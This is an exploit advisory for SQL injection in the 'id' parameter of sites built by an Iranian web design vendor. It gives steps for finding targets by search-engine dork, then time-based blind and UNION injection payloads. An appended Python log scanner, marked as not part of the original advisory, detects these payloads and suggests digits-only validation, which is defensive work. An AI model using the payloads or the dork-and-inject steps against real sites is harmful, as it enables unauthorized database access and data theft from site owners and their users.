Design and Development of Saba website - SQL Injection

2021.07.17
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.sabawww.ir
# Tested on: Windows
# CVE : N/A
=========================================
#Description
Saba Website Design, web application design and programming.

#poc
Step 1 - Find Your Target Using Dork.
Step 2 - Find Open Value In Websites Url.
Step 3 - Inject Your Payloads in URL.

#TEST
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=34' AND (SELECT 2894 FROM (SELECT(SLEEP(5)))vkbX) AND 'lVCi'='lVCi

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-5154' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x4447597349626678774f754a64756965554469767562416c576b6956417a59764a654c5565435755,0x7176767171)-- -
==================================================
/*/ TAPESH DIGITAL SECURITY TEAM IRAN / T.ME/ICTUS_TM
TAPESH Cyber Security Team
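
A defender-side check for the `id` (GET) parameter reported above, as an added example that is not part of the original advisory: it scans web access logs for non-numeric `id` values and labels the two techniques listed under #TEST. The log lines, the `/page.php` path and the function names are constructed assumptions; the UNION sample is a shortened form of the payload on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges). "/page.php" is a
# placeholder: the advisory does not name the vulnerable script.
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Jul/2021:10:00:01 +0000] "GET /page.php?id=34 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Jul/2021:10:00:05 +0000] "GET /page.php?id=34%27%20AND%20'
    '(SELECT%202894%20FROM%20(SELECT(SLEEP(5)))vkbX)%20AND%20%27lVCi%27=%27lVCi HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Jul/2021:10:00:12 +0000] "GET /page.php?id=-5154%27%20UNION%20ALL%20'
    'SELECT%20NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 812',
]

# Request line inside a combined-format log entry; group 1 is the request target.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# One signature per technique listed in the advisory's #TEST section.
SIGNATURES = {
    "time-based blind": re.compile(r"\bsleep\s*\(", re.I),
    "union query": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
}

def classify_id(value):
    """Return [] for a well-formed numeric id, otherwise a list of findings."""
    if re.fullmatch(r"\d+", value):
        return []
    # Any non-digit content in a numeric key is already worth flagging;
    # the signatures only add a label for triage.
    findings = ["non-numeric id"]
    findings += [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return findings

def scan(lines, param="id"):
    """Return (client_ip, findings) for every request with a suspicious id."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs percent-decodes values, so encoded quotes and spaces are seen.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            findings = classify_id(value)
            if findings:
                hits.append((line.split()[0], findings))
    return hits

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings))
```

The same digits-only test in `classify_id` works as server-side input validation for the parameter, alongside a parameterized query.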

